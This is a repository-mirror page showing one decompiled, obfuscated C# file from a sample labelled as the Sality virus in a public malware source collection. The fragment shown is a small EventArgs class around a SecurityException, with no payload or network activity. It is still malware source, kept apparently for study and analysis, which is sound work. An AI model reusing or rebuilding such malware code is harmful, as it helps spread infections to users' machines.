mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2024-12-22 19:36:11 +00:00
f2ac1ece55
add
55 lines
1.4 KiB
C#
55 lines
1.4 KiB
C#
// Decompiled with JetBrains decompiler
|
||
// Type: .
|
||
// Assembly: a5b7ee8e-cbdf-4eff-9144-efd0c433f3fe, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
|
||
// MVID: 97CE9FDF-0921-44CB-AE13-1E9A2A550F0F
|
||
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Virus.Win32.Sality.sil-9eb937e4a3faa7c29e8cc85118a5c87d65f8716c89e5d1b13d7d7bc334ec8975.exe
|
||
|
||
using System;
|
||
using System.Runtime.CompilerServices;
|
||
using System.Runtime.InteropServices;
|
||
using System.Security;
|
||
|
||
namespace \u0004
|
||
{
|
||
internal sealed class \u0004 : EventArgs
|
||
{
|
||
private SecurityException \u0001;
|
||
private string \u0001 = string.Empty;
|
||
private bool \u0001;
|
||
private bool \u0002;
|
||
private bool \u0003 = true;
|
||
|
||
[SpecialName]
|
||
public SecurityException \u0003() => this.\u0001;
|
||
|
||
[SpecialName]
|
||
public string \u0003() => this.\u0001;
|
||
|
||
[SpecialName]
|
||
public bool \u0003() => this.\u0003;
|
||
|
||
[SpecialName]
|
||
public bool \u0004() => this.\u0001;
|
||
|
||
[SpecialName]
|
||
public void \u0003([In] bool obj0) => this.\u0001 = obj0;
|
||
|
||
[SpecialName]
|
||
public bool \u0005() => this.\u0002;
|
||
|
||
public \u0004([In] SecurityException obj0) => this.\u0001 = obj0;
|
||
|
||
public \u0004([In] SecurityException obj0, [In] bool obj1)
|
||
: this(obj0)
|
||
{
|
||
this.\u0003 = obj1;
|
||
}
|
||
|
||
public \u0004([In] string obj0, [In] bool obj1)
|
||
: this(new SecurityException(obj0), obj1)
|
||
{
|
||
this.\u0001 = obj0;
|
||
}
|
||
}
|
||
}
|